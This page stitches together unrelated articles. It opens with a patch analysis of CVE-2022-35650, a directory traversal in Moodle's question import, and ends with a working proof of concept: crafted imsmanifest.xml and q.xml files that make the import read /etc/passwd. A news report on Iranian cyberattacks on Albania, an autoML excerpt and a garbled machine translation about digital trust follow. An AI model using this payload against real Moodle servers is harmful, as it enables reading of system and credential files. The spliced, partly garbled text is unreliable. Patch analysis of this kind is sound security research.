CVE-2022-35650 Analysis

CVE-2022-35650 Analysis

CVE-2022-35650

The vulnerability was found in Moodle, occurs due to input validation error when importing lesson questions. This insufficient path checks results in arbitrary file read risk. This vulnerability allows a remote attacker to perform directory traversal attacks. The capability to access this feature is only available to teachers, managers and admins by default.

I’ve been wanting to write a blog post about 1-day analysis for a long time, especially in PHP, and in this post, I’ll talk about what approach you should take when analyzing a 1-day CVE patch and how Make a PoC for it

Setup Debugging environment for PHP

sudo apt install php-xdebug

nano /etc/php/7.4/mods-available/xdebug.ini

zend_extension=/usr/lib64/php/modules/xdebug.so
xdebug.remote_autostart = 1
xdebug.remote_enable = 1
xdebug.remote_handler = dbgp
xdebug.remote_host = 127.0.0.1
xdebug.remote_mode = req
xdebug.remote_port = 9000

Install Xdebug extension:

make a launch.json file with the following contents in the .vscode directory:

{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Listen for Xdebug",
            "type": "php",
            "request": "launch",
            "port": 9000
        },
        {
            "name": "Launch currently open script",
            "type": "php",
            "request": "launch",
            "program": "${file}",
            "cwd": "${fileDirname}",
            "port": 0,
            "runtimeArgs": [
                "-dxdebug.start_with_request=yes"
            ],
            "env": {
                "XDEBUG_MODE": "debug,develop",
                "XDEBUG_CONFIG": "client_port=${port}"
            }
        }
    ]
}

Patch Diffing

The git commit that fixes this vulnerability could be found in this link.

--- a/question/format/blackboard_six/format.php
+++ b/question/format/blackboard_six/format.php
@@ -152,7 +152,8 @@ class qformat_blackboard_six extends qformat_blackboard_six_base {
                     }
                     if ($examfile->getAttribute('type') == 'assessment/x-bb-pool') {
                         if ($examfile->getAttribute('baseurl')) {
-                            $fileobj->filebase = $this->tempdir. '/' . $examfile->getAttribute('baseurl');
+                            $fileobj->filebase = clean_param($this->tempdir . '/'
+                                . $examfile->getAttribute('baseurl'), PARAM_SAFEPATH);
                         }
                         if ($content = $this->get_filecontent($examfile->getAttribute('file'))) {
                             $fileobj->filetype = self::FILETYPE_POOL;

The code change shows that in the old version property filebase of fileobj object will be assigned directly from getAttribute('baseurl') but in the patched version it will be sanitized by clean_param function.

Analysis

The above code is responsible for importing the questions of type blackboard in Question bank.

...
$this->tempdir = make_temp_directory('bbquiz_import/' . $uniquecode);
        if (is_readable($filename)) {
            if (!copy($filename, $this->tempdir . '/bboard.zip')) {
                $this->error(get_string('cannotcopybackup', 'question'));
                fulldelete($this->tempdir);
                return false;
            }
            $packer = get_file_packer('application/zip');
            if ($packer->extract_to_pathname($this->tempdir . '/bboard.zip', $this->tempdir)) {
                $dom = new DomDocument();

                if (!$dom->load($this->tempdir . '/imsmanifest.xml')) {
                    $this->error(get_string('errormanifest', 'qformat_blackboard_six'));
                    fulldelete($this->tempdir);
                    return false;
                }

                $xpath = new DOMXPath($dom);

                // We starts from the root element.
                $query = '//resources/resource';
                $qfile = array();

                $examfiles = $xpath->query($query);
                foreach ($examfiles as $examfile) {
                    $fileobj = new qformat_blackboard_six_file();

                    if ($examfile->getAttribute('type') == 'assessment/x-bb-qti-test'
                            || $examfile->getAttribute('type') == 'assessment/x-bb-qti-pool') {

                        if ($content = $this->get_filecontent($examfile->getAttribute('bb:file'))) {
                            $fileobj->filetype = self::FILETYPE_QTI;
                            $fileobj->filebase = $this->tempdir;
                            $fileobj->text = $content;
                            $qfile[] = $fileobj;
                        }
                    }
                     if ($examfile->getAttribute('type') == 'assessment/x-bb-pool') {
                        if ($examfile->getAttribute('baseurl')) {
                            $fileobj->filebase = $this->tempdir. '/' . $examfile->getAttribute('baseurl');
                        }
                        if ($content = $this->get_filecontent($examfile->getAttribute('file'))) {
                            $fileobj->filetype = self::FILETYPE_POOL;
                            $fileobj->text = $content;
                            $qfile[] = $fileobj;
                        }
                    }
                }

                if ($qfile) {
                    return $qfile;

...

The code will make a temp directory and extract the blackboard archive to it and then read the imsmanifest.xml file from it.

Then by an XPath query, it will retrieve all resource elements and then will make an object from qformat_blackboard_six_file class and then check the type attribute of the resource element as you saw in patch diff the vulnerability will happen if the type is assessment/x-bb-pool, so we can make a zip archive with the following imsmanifest.xml file to test if we are right:

<?xml version="1.0" encoding="UTF-8"?>
<manifest >
	<resources>
		<resource type="assessment/x-bb-pool" baseurl="test">
		test
		</resource>
	</resources>
</manifest>
import question bank

We will set a breakpoint on this line:

Great, we just found the right way and we can continue 🙂

Then the code will get baseurl attribute and if it exists it will set $fileobj->filebase to  $this->tempdir. '/' . $examfile->getAttribute('baseurl');

Did you notice something?

We have full control over baseurl attribute so we can do a directory traversal attack and set the $fileobj->filebase to any location, great what is next?

The get_filecontent function will be called with file attribute as its parameter.

get_filecontent function:

At this point, you may think that we can control the $path and perform a directory traversal but it’s wrong and you will see why.

We actually could control $path from the path attribute of the resource element but if you follow the stack trace you will notice that it will return an error because the returned content should be a valid XML file of type blackboard pool ( ͡° ͜ʖ ͡°)

The readdata function will be called and after it the readquestions will be called with the $lines that is the readdata output

As you saw we can set $fileobj->text to an arbitrary file content but in the readquestions function it will call readquestions function of qformat_blackboard_six_pool class with $fileobj->text that could be the content of any file in the filesystem:

in readquestions function it will try to parse the $text with xmlize function and will return an error if the $text dose not be a valid $xml so as I said even if we can control the $path in above function and tries to read a file that is not a valid XML file we will get an error here and we could not do anything useful ( ͡° ͜ʖ ͡°)

Let’s back to the filebase.

In readquestions function from qformat_blackboard_six class it will call set_filebase function from qformat_blackboard_six_base class so let’s see where is the usage of filebase:

That above code will get $text as its parrampter and with an regex tries to extract the value of src attribute from img tag in $text.

In order to reach this function we have to set file attribute in resource element to a valid blackboard pool xml file, hopefully we could find one sample in tests directory fixtures/sample_blackboard_pool.dat

<?xml version='1.0' encoding='utf-8'?>
<POOL>
    <TITLE value='exam 3 2008-9'/>
    <QUESTIONLIST>
        <QUESTION id='q1' class='QUESTION_TRUEFALSE' points='1'/>
        <QUESTION id='q7' class='QUESTION_MULTIPLECHOICE' points='1'/>
        <QUESTION id='q8' class='QUESTION_MULTIPLEANSWER' points='1'/>
        <QUESTION id='q39-44' class='QUESTION_MATCH' points='1'/>
        <QUESTION id='q9' class='QUESTION_ESSAY' points='1'/>
        <QUESTION id='q27' class='QUESTION_FILLINBLANK' points='1'/>
    </QUESTIONLIST>
    <QUESTION_TRUEFALSE id='q1'>
        <BODY>
            <TEXT><![CDATA[<h1> He Heeeeeeeeeeee</h1>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q1_a1'>
            <TEXT>False</TEXT>
        </ANSWER>
        <ANSWER id='q1_a2'>
            <TEXT>True</TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q1_a2'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[42 is the Ultimate Answer.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_TRUEFALSE>
    <QUESTION_MULTIPLECHOICE id='q7'>
        <BODY>
            <TEXT><![CDATA[<span style="font-size:12pt">What's between orange and green in the spectrum?</span>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q7_a1' position='1'>
        <TEXT><![CDATA[<span style="font-size:12pt">red</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q7_a2' position='2'>
        <TEXT><![CDATA[<span style="font-size:12pt">yellow</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q7_a3' position='3'>
        <TEXT><![CDATA[<span style="font-size:12pt">blue</span>]]></TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q7_a2'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[Only yellow is between orange and green in the spectrum.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_MULTIPLECHOICE>
    <QUESTION_MULTIPLEANSWER id='q8'>
        <BODY>
            <TEXT><![CDATA[<span style="font-size:12pt">What's between orange and green in the spectrum?</span>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q8_a1' position='1'>
        <TEXT><![CDATA[<span style="font-size:12pt">yellow</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q8_a2' position='2'>
        <TEXT><![CDATA[<span style="font-size:12pt">red</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q8_a3' position='3'>
        <TEXT><![CDATA[<span style="font-size:12pt">off-beige</span>]]></TEXT>
        </ANSWER>
        <ANSWER id='q8_a4' position='4'>
        <TEXT><![CDATA[<span style="font-size:12pt">blue</span>]]></TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q8_a1'/>
            <CORRECTANSWER answer_id='q8_a3'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[Only yellow and off-beige are between orange and green in the spectrum.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_MULTIPLEANSWER>
    <QUESTION_MATCH id='q39-44'>
        <BODY>
            <TEXT><![CDATA[<i>Classify the animals.</i>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q39-44_a1' position='1'>
            <TEXT><![CDATA[frog]]></TEXT>
        </ANSWER>
        <ANSWER id='q39-44_a2' position='2'>
            <TEXT><![CDATA[cat]]></TEXT>
        </ANSWER>
        <ANSWER id='q39-44_a3' position='3'>
            <TEXT><![CDATA[newt]]></TEXT>
        </ANSWER>
        <CHOICE id='q39-44_c1' position='1'>
            <TEXT><![CDATA[mammal]]></TEXT>
        </CHOICE>
        <CHOICE id='q39-44_c2' position='2'>
            <TEXT><![CDATA[insect]]></TEXT>
        </CHOICE>
        <CHOICE id='q39-44_c3' position='3'>
            <TEXT><![CDATA[amphibian]]></TEXT>
        </CHOICE>
        <GRADABLE>
            <CORRECTANSWER answer_id='q39-44_a1' choice_id='q39-44_c3'/>
            <CORRECTANSWER answer_id='q39-44_a2' choice_id='q39-44_c1'/>
            <CORRECTANSWER answer_id='q39-44_a3' choice_id='q39-44_c3'/>
        </GRADABLE>
    </QUESTION_MATCH>
    <QUESTION_ESSAY id='q9'>
        <BODY>
            <TEXT><![CDATA[How are you?]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q9_a1'>
            <TEXT><![CDATA[Blackboard answer for essay questions will be imported as informations for graders.]]></TEXT>
        </ANSWER>
        <GRADABLE>
        </GRADABLE>
    </QUESTION_ESSAY>
    <QUESTION_FILLINBLANK id='q27'>
        <BODY>
            <TEXT><![CDATA[<span style="font-size:12pt">Name an amphibian: __________.</span>]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q27_a1' position='1'>
            <TEXT>frog</TEXT>
        </ANSWER>
        <GRADABLE>
        </GRADABLE>
    </QUESTION_FILLINBLANK>
</POOL>

As you saw the code it will tries to extract image source file from HTML defined in TEXT element.

After extracting that it will make a variable called $fullpath and assign value $this->filebase . '/' . $path to it and also $this->filebase is under our control as I showed.

if the $fullpath is a readable file the code will call store_file_for_text_field, so lets set the baseurl in imsmanifest.xml and the value of src attribute in q.xml to make $fullpath point to a valid file:

...
<TEXT><![CDATA[<img src="passwd">]]></TEXT>
...
<?xml version="1.0" encoding="UTF-8"?>
<manifest >
	<resources>
		<resource type="assessment/x-bb-pool" baseurl="../../../../../../../etc" file="q.xml">
		test
		</resource>
	</resources>
</manifest>

Here is the store_file_for_text_field function:

As you can see finally it will call create_file_from_pathname and the second petameter that is the location of file in filesystem is under our control and we can make it to point to any file in the file system

( ͡° ͜ʖ ͡°)

Final PoC

imsmanifest.xml:

<?xml version="1.0" encoding="UTF-8"?>
<manifest >
	<resources>
		<resource type="assessment/x-bb-pool" baseurl="../../../../../../../etc" file="q.xml">
		test
		</resource>
	</resources>
</manifest>

q.xml:

<?xml version='1.0' encoding='utf-8'?>
<POOL>
    <TITLE value='PoC exam'/>
    <QUESTIONLIST>
        <QUESTION id='q1' class='QUESTION_TRUEFALSE' points='1'/>
    </QUESTIONLIST>
    <QUESTION_TRUEFALSE id='q1'>
        <BODY>
            <TEXT><![CDATA[<img src="passwd">]]></TEXT>
            <FLAGS>
                <ISHTML value='true'/>
                <ISNEWLINELITERAL value='false'/>
            </FLAGS>
        </BODY>
        <ANSWER id='q1_a1'>
            <TEXT>False</TEXT>
        </ANSWER>
        <ANSWER id='q1_a2'>
            <TEXT>True</TEXT>
        </ANSWER>
        <GRADABLE>
            <CORRECTANSWER answer_id='q1_a2'/>
            <FEEDBACK_WHEN_CORRECT><![CDATA[You gave the right answer.]]></FEEDBACK_WHEN_CORRECT>
            <FEEDBACK_WHEN_INCORRECT><![CDATA[42 is the Ultimate Answer.]]></FEEDBACK_WHEN_INCORRECT>
        </GRADABLE>
    </QUESTION_TRUEFALSE>
</POOL>

We can view the file:

Preview the imported question

you will find the location of file here:

/etc/passwd content

It seems to compute nicely! *grins*

Hello, congratulations on finding this bug
I tested this POC but it doesn’t work.
I combine all poc xml file in zip file and submit that but id doesn’t work and it’s src address of img tag is ‘passwd’ .
can you help me to proof it ?
thanks for your attention

Hi, Thank you
I don’t find this bug, the purpose of this blog post is also not to show this bug but patch analysis and debugging in PHP, I chose this CVE randomly.
Since the bug is patch traversal and the prefix of the path depends on moodle data directory maybe you need to add more ../

Iranian Hackers likely Behind Disruptive Cyberattacks Against Albanian Government

Iranian Hackers likely Behind Disruptive Cyberattacks Against Albanian Government

Iranian Hackers

A threat actor working to further Iranian goals is said to have been behind a set of disruptive cyberattacks against Albanian government services in mid-July 2022.

Cybersecurity firm Mandiant said the malicious activity against a NATO state represented a “geographic expansion of Iranian disruptive cyber operations.”

The July 17 attacks, according to Albania’s National Agency of Information Society, forced the government to “temporarily close access to online public services and other government websites” because of a “synchronized and sophisticated cybercriminal attack from outside Albania.”

The politically motivated disruptive operation, per Mandiant, entailed the deployment of a new ransomware family called ROADSWEEP that included a ransom note with the text: “Why should our taxes be spent on the benefit of DURRES terrorists?”

A front named HomeLand Justice has since claimed credit for the cyber offensive, with the group also allegedly claiming to have used a wiper malware in the attacks. Although the exact nature of the wiper is unclear as yet, Mandiant said an Albanian user submitted a sample for what’s called ZeroCleare on July 19, coinciding with the attacks.

ZeroCleare, first documented by IBM in December 2019 as part of a campaign targeting the industrial and energy sectors in the Middle East, is designed to wipe the master boot record (MBR) and disk partitions on Windows-based machines. It’s believed to be a collaborative effort between different Iranian nation-state actors, including OilRig (aka APT34, ITG13, or Helix Kitten).

Also deployed in the Albanian attacks was a previously unknown backdoor dubbed CHIMNEYSWEEP that’s capable of taking screenshots, listing and collecting files, spawning a reverse shell, and supporting keylogging functionality.

Iranian Hackers

The implant, besides sharing numerous code overlaps with ROADSWEEP, is delivered to the system via a self-extracting archive alongside decoy Microsoft Word documents that contain images of Massoud Rajavi, the erstwhile leader of People’s Mojahedin Organization of Iran (MEK).

The earliest iterations of CHIMNEYSWEEP date back to 2012 and indications are that the malware may have been utilized in attacks aimed at Farsi and Arabic speakers.

The cybersecurity firm, which was acquired by Google earlier this year, said it didn’t have enough evidence linking the intrusions to a named adversarial collective, but noted with moderate confidence that one or more bad actors operating in support of Iran’s objectives are involved.

The connections to Iran stem from the fact that the attacks took place less than a week prior to the World Summit of Free Iran conference on July 23-24 near the port city of Durres by entities opposing the Iranian government, particularly the members of the MEK.

“The use of ransomware to conduct a politically motivated disruptive operation against the government websites and citizen services of a NATO member state in the same week an Iranian opposition groups’ conference was set to take place would be a notably brazen operation by Iran-nexus threat actors,” the researchers said.

The findings also come two months after the Iranian advanced persistent threat (APT) group tracked as Charming Kitten (aka Phosphorus) was linked to an attack directed against an unnamed construction company in the southern U.S.

Automated techniques could make it easier to develop AI

“BERT takes months of computation and is very expensive—like, a million dollars to generate that model and repeat those processes,” Bahrami says. “So if everyone wants to do the same thing, then it’s expensive—it’s not energy efficient, not good for the world.” 

Although the field shows promise, researchers are still searching for ways to make autoML techniques more computationally efficient. For example, methods like neural architecture search currently build and test many different models to find the best fit, and the energy it takes to complete all those iterations can be significant.

AutoML techniques can also be applied to machine-learning algorithms that don’t involve neural networks, like creating random decision forests or support-vector machines to classify data. Research in those areas is further along, with many coding libraries already available for people who want to incorporate autoML techniques into their projects. 

The next step is to use autoML to quantify uncertainty and address questions of trustworthiness and fairness in the algorithms, says Hutter, a conference organizer. In that vision, standards around trustworthiness and fairness would be akin to any other machine-learning constraints, like accuracy. And autoML could capture and automatically correct biases found in those algorithms before they’re released.

The search continues

But for something like deep learning, autoML still has a long way to go. Data used to train deep-learning models, like images, documents, and recorded speech, is usually dense and complicated. It takes immense computational power to handle. The cost and time for training these models can be prohibitive for anyone other than researchers working at deep-pocketed private companies

One of the competitions at the conference asked participants to develop energy-efficient alternative algorithms for neural architecture search. It’s a considerable challenge because this technique has infamous computational demands. It automatically cycles through countless deep-learning models to help researchers pick the right one for their application, but the process can take months and cost over a million dollars. 

The goal of these alternative algorithms, called zero-cost neural architecture search proxies, is to make neural architecture search more accessible and environmentally friendly by significantly cutting down on its appetite for computation. The result takes only a few seconds to run, instead of months. These techniques are still in the early stages of development and are often unreliable, but machine-learning researchers predict that they have the potential to make the model selection process much more efficient.

Eliminating the lack of digital trust

Eliminating the lack of digital trust

Eliminating the lack of digital trust


Eliminating the lack of digital trust

With the proliferation of technology, rebuilding digital trust has become very important.
Today’s reliance on digital is under pressure to change in all areas of commerce, work, lifestyle, transportation, education and healthcare. In today’s “extremely connected world”, “digital trust” is very important.

What is “Digital Trust”?

“Digital Trust” can be defined as “social trust in the ability of digital technology and the organizations that provide it to protect the public interest.” Trust in digital technology will become an increasingly important issue for society and governance. In addition, gaining trust in digital technology requires an appropriate security and governance framework and the use of responsible and ethical techniques and data.
Unfortunately, it’s hard to say that the public trusts in the protection of personal data in businesses and governments, and the impact of modern technology on decision-making. According to the World Economic Forum, the lack of trust is real and growing. Challenges include lack of security, ethical flaws, and inadequate transparency.
The World Economic Forum’s Digital Trust Initiative continues to work to form a global consensus on what digital technology is credible and what can be done to improve it. ..
The World Economic Forum also warns that “declining trust due to anxiety about how some organizations use digital technology can undermine the social benefits of digitalization.”
In addition to these World Economic Forum efforts, it is encouraging that regulators have broad views on the need to protect privacy and address the growing threat of cyberattacks. Regulators are also exploring how to regulate completely different worlds such as machine learning, artificial intelligence (AI), and the Metaverse.
In a situation of accelerating innovation and increasing reliance on digital systems, truly effective regulation is a complex balance of social concerns, corporate credit problems, and the role of governments in driving progress. It is considered necessary to take action.

Turn digital challenges into opportunities

The urgent need to eliminate the lack of trust is, from a different perspective, a great opportunity for companies to be proactive in using technology and data. Recognizing this opportunity, companies can move wisely towards solving Digital Trust’s challenges, aiming to demonstrate true accountability and transparency, and linking social awareness and progress to their brand and reputation. I can do it.
Being able to reliably and consistently explain that a company is responsible for collecting data and making data-based decisions will provide a new level of transparency and enhance credibility. Will have a big meaning. It will also increase confidence in digital technologies used in every aspect of our lives, from life-sustaining medical devices to smarter critical infrastructures.
From the perspective of a conscious and active global consumer, an informed and proactive approach is an important differentiator for a company. Leading companies that recognize the value of working to improve the reliability of digital technology can also anticipate issues with regulatory agencies. This means that organizations provide the resources they need to exceed today’s regulatory requirements.

Leverage the power of social dialogue

On the issue of digital trust, it is imperative to promote well-informed social dialogue. We need to achieve constructive dialogue in an open space as soon as possible, but it is by no means easy.
How to meet the challenge of digital trust, who will lead the public debate on digital trust, including consumers, businesses, regulators and governments. Perhaps some of the world’s leading companies are on the path to improving their brands while advocating social responsibility for consumer data protection. In addition, new trust frameworks, certifications and rating services are expected to be developed as governments, consumers and investors demand transparency and credibility in their organizations’ approaches.
The World Economic Forum said:
“Digital trust is essential in a global economy that relies on connectivity, data utilization, and new innovations. To be reliable, technology must be secure and the confidentiality of connected systems. It must be used responsibly, ensuring sex, completeness and availability. “
And to build a new world with safe and reliable digital capabilities, we need the power of everyone in our society.
This article is a translation of “Reversing the digital trust de ficit” published by KPMG International in May 2022. If there is a discrepancy between the translation and the original English text, the original English text shall prevail.